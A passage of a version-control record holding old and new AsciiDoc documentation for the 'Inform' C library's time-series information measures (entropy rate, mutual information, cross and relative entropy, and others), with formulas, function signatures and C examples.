{0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble *ce = inform_local_conditional_entropy(xs, ys, 20, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 3.00, 3.00, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19,\n\/\/ 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.42, 0.42, 0.42, 2.00 }\n\ninform_local_conditional_entropy(ys, xs, 20, 2, 2, ce, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 1.32, 1.32, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10,\n\/\/ 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.74, 0.74, 0.74, 3.91 }\n\nfree(ce);\n----\n****\n\n[[cross-entropy]]\n== Cross Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Cross_entropy[Cross entropy] between two distributions\nstem:[p_X] and stem:[q_X] measures the amount of information needed to identify events\nusing a coding scheme optimized for stem:[q_X] when stem:[p_X] is the \"real\" distribution\nover stem:[X].\n[stem]\n++++\nH(p,q) = -\\sum_{x} p(x) \\log_2{q(x)}\n++++\nCross entropy's local variant is equivalent to the self-information of stem:[q_X], and as\nsuch is implemented by <<inform_local_block_entropy,inform_local_block_entropy>>.\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_cross_entropy]]\n[source,c]\n----\ndouble inform_cross_entropy(int const *ps, int const *qs, size_t n,\n int b, inform_error *err);\n----\nCompute the cross entropy between the \"true\" and \"unnatural\" distributions stem:[p_X] and\nstem:[q_X] from associated time series `ps` and `qs`, respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const ps[10] = {0,1,1,0,1,0,0,1,0,0};\nint const qs[10] = {0,0,0,0,0,1,1,0,0,1};\n\ndouble ce = inform_cross_entropy(ps, qs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 1.003530\n\nce = inform_cross_entropy(qs, ps, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.912454\n----\n****\n
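\nCross entropy and <<relative-entropy,relative entropy>> are linked by a standard decomposition (see <<Cover1991>>):\n\n[stem]\n++++\nH(p,q) = H(p) + D_{KL}(p||q),\n++++\n\nso the first value above exceeds the plain Shannon entropy of `ps` by exactly the divergence of `qs` from `ps`; by hand, stem:[1.003530 = 0.970951 + 0.032579], where the two right-hand values are hand-computed from the empirical distributions rather than library output.\n\n[[effective-information]]\n== Effective Information\n\nNOTE: Judging from the parameter names alone (an assumption on our part, not a documented contract), `tpm` is an stem:[n \\times n] transition probability matrix and `inter` is an intervention distribution over the stem:[n] states.\n\n****\n[[inform_effective_info]]\n[source,c]\n----\ndouble inform_effective_info(double const *tpm, double const *inter,\n size_t n, inform_error *err);\n----\n****\n\n[[entropy-rate]]\n== Entropy Rate\nhttps:\/\/en.wikipedia.org\/wiki\/Entropy_rate[Entropy rate] quantifies the amount of\ninformation needed to describe the next state of stem:[X] given observations of\nstem:[X^{(k)}]. In other words, it is the entropy of the time series conditioned on the\nstem:[k]-histories. 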
The local entropy rate\n[stem]\n++++\nh_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\ncan be averaged to obtain the global entropy rate\n[stem]\n++++\nH_X(k) = \\langle h_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\nMuch as with <<active-info, active information>>, the local and average entropy rates are\nformally obtained in the limit\n[stem]\n++++\nh_{X,i} = \\lim_{k\\rightarrow \\infty}h_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nH_X = \\lim_{k\\rightarrow \\infty}H_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_entropy_rate]]\n[source,c]\n----\ndouble inform_entropy_rate(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble er = inform_entropy_rate(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.679270\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er = inform_entropy_rate(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.625349\n----\n****\n\n****\n[[inform_local_entropy_rate]]\n[source,c]\n----\ndouble *inform_local_entropy_rate(int const *series, size_t n,\n size_t m, int b, size_t k, double *er, inform_error *err);\n----\nCompute the local entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *er = inform_local_entropy_rate(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 1.000, 0.000, 0.585, 0.585, 1.585, 0.000, 1.000 }\nfree(er);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er[14];\ninform_local_entropy_rate(series, 2, 9, 2, 2, er, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 0.415, 1.585, 0.585, 0.585, 1.585, 0.000, 2.000,\n\/\/ 0.000, 0.415, 0.585, 0.000, 0.415, 0.585, 0.000 }\n\n\/\/ no need to free since `er` was statically allocated in this scope\n\/\/ free(er);\n----\n****\n\n[[excess-entropy]]\n== Excess Entropy\n\n****\n[[inform_excess_entropy]]\n[source,c]\n----\ndouble inform_excess_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\n****\n\n****\n[[inform_local_excess_entropy]]\n[source,c]\n----\ndouble *inform_local_excess_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ee, inform_error *err);\n----\n****\n\n[[information-flow]]\n== Information Flow\n\n****\n[[inform_information_flow]]\n[source,c]\n----\ndouble inform_information_flow(int const *src, int const *dst,\n int const *back, size_t l_src, size_t l_dst, size_t l_back,\n size_t n, size_t m, int b, inform_error *err);\n----\n****\n\n[[evidence-of-integration]]\n== Evidence Of Integration\n\n****\n[[inform_integration_evidence]]\n[source,c]\n----\ndouble *inform_integration_evidence(int const *series, size_t l,\n size_t n, int const *b, double *evidence, inform_error 
*err);\n----\n****\n\n****\n[[inform_integration_evidence_part]]\n[source,c]\n----\ndouble *inform_integration_evidence_part(int const *series, size_t l,\n size_t n, int const *b, size_t const *parts, size_t nparts,\n double *evidence, inform_error *err);\n----\n****\n\n[[mutual-information]]\n== Mutual Information\nhttps:\/\/en.wikipedia.org\/wiki\/Mutual_information[Mutual information] (MI) is a measure of\nthe amount of mutual dependence between at least two random variables. Locally, MI is\ndefined as\n[stem]\n++++\ni_i(X_1,\\ldots,X_l) = \\log_2{\\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}}.\n++++\nThe mutual information is then just the time average of stem:[i_i(X_1,\\ldots,X_l)]:\n[stem]\n++++\nI(X_1,\\ldots,X_l) =\n \\sum_{x_{1,i},\\ldots,x_{l,i}} p(x_{1,i},\\ldots,x_{l,i}) \\log_2{\\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}}.\n++++\nSee <<Cover1991>> for more details.\n\n****\n[[inform_mutual_info]]\n[source,c]\n----\ndouble inform_mutual_info(int const *series, size_t l, size_t n,\n int const *b, inform_error *err);\n----\nCompute the mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1}; \/\/ var 2\n\ndouble mi = inform_mutual_info(xs, 2, 20, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 0.214171\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1}; \/\/ var 3\n\ndouble mi = inform_mutual_info(xs, 3, 20, (int[3]){2,2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 1.095462\n----\n****\n
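\nAveraging the local values yields a convenient cross-check against plain entropies,\n\n[stem]\n++++\nI(X_1,\\ldots,X_l) = \\sum_{j=1}^{l} H(X_j) - H(X_1,\\ldots,X_l),\n++++\n\nwhich follows directly from the definition above and lets the printed values be verified with pencil and paper from the empirical marginal and joint distributions.\n\n****\n[[inform_local_mutual_info]]\n[source,c]\n----\ndouble *inform_local_mutual_info(int const *series, size_t l, size_t n,\n int const *b, double *mi, inform_error *err);\n----\nCompute the local mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. 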
Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1}; \/\/ var 2\n\ndouble *mi = inform_local_mutual_info(xs, 2, 20, (int[2]){2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { -1.000, -1.000, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 1.585, 1.585, 1.585, -1.585 }\nfree(mi);\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1}; \/\/ var 3\n\ndouble *mi = inform_local_mutual_info(xs, 3, 20, (int[3]){2,2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 3.322, 3.322, 0.322, 0.152 }\nfree(mi);\n----\n****\n\n[[partial-information-decomposition]]\n== Partial Information Decomposition\n\nPartial information decomposition (PID) splits the information that a set of source variables carries about a stimulus into redundant, unique, and synergistic contributions arranged on a lattice of source combinations. The field names `imin` and `pi` suggest an implementation in the spirit of Williams and Beer's stem:[I_{min}]-based decomposition, though this reading should be confirmed against the implementation.\n\n****\n[[inform_pid_source]]\n[source,c]\n----\ntypedef struct inform_pid_source\n{\n size_t *name;\n struct inform_pid_source **above;\n struct inform_pid_source **below;\n size_t size, n_above, n_below;\n double imin;\n double pi;\n} inform_pid_source;\n----\n****\n\n****\n[[inform_pid_lattice]]\n[source,c]\n----\ntypedef struct inform_pid_lattice\n{\n inform_pid_source **sources;\n inform_pid_source *top;\n inform_pid_source *bottom;\n size_t size;\n} inform_pid_lattice;\n----\n****\n\n****\n[[inform_pid_lattice_free]]\n[source,c]\n----\nvoid inform_pid_lattice_free(inform_pid_lattice *l);\n----\n****\n\n****\n[[inform_pid]]\n[source,c]\n----\ninform_pid_lattice *inform_pid(int const *stimulus,\n int const *responses, size_t l, size_t n, int bs,\n int const *br, inform_error *err);\n----\n****\n\n[[predictive-information]]\n== Predictive Information\n\n****\n[[inform_predictive_info]]\n[source,c]\n----\ndouble inform_predictive_info(int const *series, size_t n, size_t m,\n int b, size_t kpast, size_t kfuture, inform_error *err);\n----\n****\n\n****\n[[inform_local_predictive_info]]\n[source,c]\n----\ndouble *inform_local_predictive_info(int const *series, size_t n,\n size_t m, int b, size_t kpast, size_t kfuture, double *pi,\n inform_error *err);\n----\n****\n\n[[relative-entropy]]\n== Relative Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Kullback%E2%80%93Leibler_divergence[Relative entropy], also\nknown as the Kullback-Leibler divergence, measures the amount of information gained in\nswitching from a prior distribution stem:[q_X] to a posterior distribution stem:[p_X] over\n_the same support_:\n[stem]\n++++\nD_{KL}(p||q) = \\sum_{x_i} p(x_i) \\log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nThe local counterpart is\n[stem]\n++++\nd_{KL,i}(p||q) = \\log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nNote that the average in moving from the local to the non-local relative entropy is taken\nover the posterior distribution.\n\nSee <<Kullback1951>> and <<Cover1991>> for more information.\n
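\nAs with conditional entropy, a freestanding computation may clarify what is being measured; the sketch below is plain C over hand-counted empirical distributions (not the *Inform* implementation) and reproduces the first value of the example that follows:\n\n[source,c]\n----\n#include <math.h>\n#include <stdio.h>\n\nint main(void)\n{\n    int const xs[10] = {0,1,0,0,0,0,0,0,0,1}; \/\/ posterior sample\n    int const ys[10] = {0,1,1,1,1,0,0,1,0,0}; \/\/ prior sample\n    double p[2] = {0,0}, q[2] = {0,0};\n    for (int i = 0; i < 10; ++i) { p[xs[i]] += 0.1; q[ys[i]] += 0.1; }\n    double dkl = 0.0;\n    for (int x = 0; x < 2; ++x)\n        if (p[x] > 0) dkl += p[x] * log2(p[x] \/ q[x]);\n    printf(\"D_KL(p||q) = %f\\n\", dkl); \/\/ ~ 0.278072, matching inform_relative_entropy\n    return 0;\n}\n----\n\n****\n[[inform_relative_entropy]]\n[source,c]\n----\ndouble inform_relative_entropy(int const *xs, int const *ys, size_t n,\n int b, inform_error *err);\n----\nCompute the relative entropy between time series drawn from posterior and prior\ndistributions, here `xs` and `ys` 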
respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble re = inform_relative_entropy(xs, ys, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.278072\n\nre = inform_relative_entropy(ys, xs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.321928\n----\n****\n\n****\n[[inform_local_relative_entropy]]\n[source,c]\n----\ndouble *inform_local_relative_entropy(int const *xs, int const *ys,\n size_t n, int b, double *re, inform_error *err);\n----\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble *re = inform_local_relative_entropy(xs, ys, 10, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { 0.678, -1.322, 0.678, 0.678, 0.678, 0.678, 0.678,\n\/\/ 0.678, 0.678, -1.322 };\n\ninform_local_relative_entropy(ys, xs, 10, 2, re, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { -0.678, 1.322, 1.322, 1.322, 1.322, -0.678, -0.678, 1.322,\n\/\/ -0.678, -0.678 }\n\nfree(re);\n----\n****\n\n[[separable-information]]\n== Separable Information\n\n****\n[[inform_separable_info]]\n[source,c]\n----\ndouble inform_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_separable_info]]\n[source,c]\n----\ndouble *inform_local_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k, double *si,\n inform_error *err);\n----\n****\n\n[[transfer-entropy]]\n== Transfer Entropy\n\n****\n[[inform_transfer_entropy]]\n[source,c]\n----\ndouble inform_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_transfer_entropy]]\n[source,c]\n----\ndouble *inform_local_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n double *te, inform_error *err);\n----\n****\n","old_contents":"[[time-series-measures]]\n= Time Series Measures\n\nThe original purpose of *Inform* was to analyze time series data. This explains why most of\n*Inform*'s functionality resides in functions specifically optimized for analyzing time\nseries. The API was designed to be easy to use in C or {cpp}, or to be wrapped in a\nhigher-level language, e.g. https:\/\/elife-asu.github.io\/PyInform[Python]. This means that we\navoided some of the \"niceties\" of C, such as extensive use of macros and other generic\natrocities, in favor of wrappability. Keep this in mind as you learn the API.\n\nMany information measures have \"local\" variants which compute a time series of point-wise\nvalues. These local variants have names similar to their averaged or global counterparts,\ne.g <<inform_active_info,inform_active_info>> and\n<<inform_local_active_info,inform_local_active_info>>. We have been meticulous in ensuring\nthat function and parameter names are consistent across measures. 
If you notice some\ninconsistency, please https:\/\/github.com\/elife-asu\/inform\/issue[report it as an issue].\n\n[[time-series-notation]]\n== Notation\n\nThroughout the discussion of time series measures, we will try to use a consistent notation.\nWe will denote random variables as stem:[X,Y,\\ldots], and let stem:[x_i,y_i,\\ldots]\nrepresent the stem:[i]-th time step of a time series drawn from the associated random\nvariable. Many of the measures consider stem:[k]-histories (a.k.a stem:[k]-blocks) of the\ntime series, e.g. stem:[x_i^{(k)} = \\left\\{x_{i-k+1}, x_{i-k+2},\\ldots,x_i\\right\\}].\n\nWhen denoting probability distributions, we will only make the random variable explicit in\nsituations where the notation is ambiguous. We will typically write stem:[p(x_i)],\nstem:[p(x_i^{(k)})], and stem:[p(x_i^{(k)}, x_{i+1})] to denote the empirical probability\nof observing the stem:[x_i] state, the stem:[x_i^{(k)}] stem:[k]-history, and the joint\nprobability of observing stem:[\\left(x_i^{(k)}, x_{i+1}\\right)].\n\n*Please report any notational ambiguities as an\nhttps:\/\/github.com\/elife-asu\/inform\/issue[issue].*\n\n[[time-series-detail]]\n== Implementation Details\n\n=== The Base: States and Logarithms\nThe word \"base\" has two different meanings in the context of information measures on time\nseries. It could refer to the base of the time series itself, that is the number of unique\nstates in the time series. For example, the time series stem:[\\{0,2,1,0,0\\}] is a base-3\ntime series. On the other hand, it could refer to the base of the logarithm used in\ncomputing the information content of the inferred probability distributions. The problem is\nthat these two meanings clash. The base of the time series affects the range of values the\nmeasure can produce, and the base of the logarithm represents a rescaling of those values.\n\nIn this library we deal with this by *always* using base-2 logarithms, and having the user\nspecify the base of the time series \u2014 don't worry, we <<error-handling, set an error>> if\nthe provided base doesn't make sense. All of this ensures that the library is a simple as\nreasonably possible.\n\n=== Multiple Initial Conditions\nYou generally need *a lot* of data to infer a probability distribution. An experimentalist\nor simulator might then collect data over multiple trials or initial conditions. Most of\n*Inform*'s time series measures allow the user to pass in a two-dimensional, rectangular\narray which each row representing a time series from a different initial condition. From\nthis the probability distributions are inferred, and the desired value is calculated. This\nhas the downside of requiring that the user store all of the data in memory, but it has the\nadvantage of being fast and simple. Trade-offs, man...\n\nA subsequent release, https:\/\/github.com\/elife-asu\/inform\/milestone\/3[likely v1.1.0], will\nallows the initial conditions to have time series of different lengths and will provide\naccumulator implementations of all of these measures that will let the incrementally\nconstruct the distributions. 
This will lift some of the memory burden at the expense of\nruntime performance.\n\n=== Calling Conventions\nAll of the of the time series functions described in this section use the same basic calling\nconventions and use the same (or similar) argument names were possible.\n\n|===\n| Argument Name | Description\n\n| `series`\n| A 2-D or 3-D, finite-state time series in contiguous, row-major form\n\n| `l`\n| The number of \"sources\" or variables in a 3-D time series\n\n| `n`\n| The number of initial conditions per \"source\"\n\n| `m`\n| The number of time steps per \"source\"\n\n| `b`\n| The base of the time series\n\n| `k`\n| The length history length\n\n| `err`\n| An error argument\n|===\n\nAverage measures generally return a double-precision, floating-point value while local\nvariants return a pointer to an appropriately shaped, contiguous array. Local measures\naccept an argument, often named after the function (e.g. local active information takes an\n`ai` argument), which is used to store the computed local values. If that argument is NULL,\nthen the function allocates an array.\n\nWe will try to note any deviations from these conventions.\n\n[[active-info]]\n== Active Information\n\nActive information (AI) was introduced in <<Lizier2012>> to quantify information storage in\ndistributed computations. Active information is defined in terms of a temporally local\nvariant\n\n[stem]\n++++\na_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nwhere the probabilities are constructed empirically from the _entire_ time series. From the\nlocal variant, the temporally global active information is defined as\n\n[stem]\n++++\nA_X(k) = \\langle a_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nStrictly speaking, the local and average active information are defined as\n\n[stem]\n++++\na_{X,i} = \\lim_{k\\rightarrow \\infty}a_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nA_X = \\lim_{k\\rightarrow \\infty}A_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\n****\n[[inform_active_info]]\n[source,c]\n----\ndouble inform_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble ai = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.305958\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.359879\n----\n****\n\n****\n[[inform_local_active_info]]\n[source,c]\n----\ndouble *inform_local_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, double *ai, inform_error *err);\n----\nCompute the local active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *ai = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ {-0.193, 0.807, 0.222, 0.222, -0.363, 1.222, 0.222}\nfree(ai);\n----\n\nTwo initial 
conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai[14];\ninform_local_active_info(series, 2, 9, 2, 2, ai, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ { 0.807, -0.363, 0.637, 0.637, -0.778, 0.807, -1.193,\n\/\/ 0.807, 0.807, 0.222, 0.807, 0.807, 0.222, 0.807 }\n\n\/\/ no need to free since `ai` was statically allocated in this scope\n\/\/ free(ai);\n----\n****\n\n[[block-entropy]]\n== Block Entropy\nBlock entropy, also known as stem:[N]-gram entropy <<Shannon1948>>, is the standard Shannon\nentropy of the stem:[k]-histories of a time series:\n[stem]\n++++\nH(X^{(k)}) = -\\sum_{x_i^{(k)}} p(x_i^{(k)}) \\log_2{p(x_i^{(k)})}\n++++\nwhich reduces to the traditional Shannon entropy for stem:[k=1].\n\n****\n[[inform_block_entropy]]\n[source,c]\n----\ndouble inform_block_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k = 1\ndouble h = inform_block_entropy(series, 1, 9, 2, 1, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 0.991076\n\n\/\/ k = 2\nh = inform_block_entropy(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.811278\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.936278\n----\n****\n\n****\n[[inform_local_block_entropy]]\n[source,c]\n----\ndouble *inform_local_block_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ent, inform_error *err);\n----\nCompute the local block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k == 1\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 1, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 0.848, 0.848, 1.170, 1.170, 1.170, 1.170, 0.848, 0.848, 0.848 }\n\n\/\/ k == 2\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 3.000, 1.415, 1.415, 1.415, 3.000, 1.415, 1.415 }\n\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h[16];\ninform_local_block_entropy(series, 2, 9, 2, 2, h, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 2.415, 2.415, 2.415, 2.415, 2.000, 1.415, 1.415,\n\/\/ 2.000, 1.415, 2.415, 2.000, 1.415, 2.415, 2.000, 1.415 }\n\n\/\/ no need to free since `h` was statically allocated in this scope\n\/\/ free(h);\n----\n****\n\n[[conditional-entropy]]\n== Conditional Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Conditional_entropy[Conditional entropy] is a measure of the\namount of information required to describe a random variable stem:[Y] given knowledge of\nanother random variable stem:[X]. 
When applied to time series, two time series are used to\nconstruct the empirical distributions, and <<inform_shannon_ce,inform_shannon_ce>> can be\napplied to yield\n[stem]\n++++\nH(Y|X) = - \\sum_{x_i,y_i} p(x_i,y_i) \\log_2{p(y_i|x_i)}.\n++++\nThis can be viewed as the time-average of the local conditional entropy\n[stem]\n++++\nh_i(Y|X) = -\\log_2{p(y_i|x_i)}.\n++++\nSee <<Cover1991>> for more information.\n\n****\n[[inform_conditional_entropy]]\n[source,c]\n----\ndouble inform_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, inform_error *err);\n----\nCompute the conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble ce = inform_conditional_entropy(xs, ys, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.597107\n\nce = inform_conditional_entropy(ys, xs, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.507757\n----\n****\n\n****\n[[inform_local_conditional_entropy]]\n[source,c]\n----\ndouble *inform_local_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, double *mi, inform_error *err);\n----\nCompute the local conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble *ce = inform_local_conditional_entropy(xs, ys, 20, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 3.00, 3.00, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19,\n\/\/ 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.42, 0.42, 0.42, 2.00 }\n\ninform_local_conditional_entropy(ys, xs, 20, 2, 2, ce, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 1.32, 1.32, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10,\n\/\/ 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.74, 0.74, 0.74, 3.91 }\n\nfree(ce);\n----\n****\n\n[[cross-entropy]]\n== Cross Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Cross_entropy[Cross entropy] 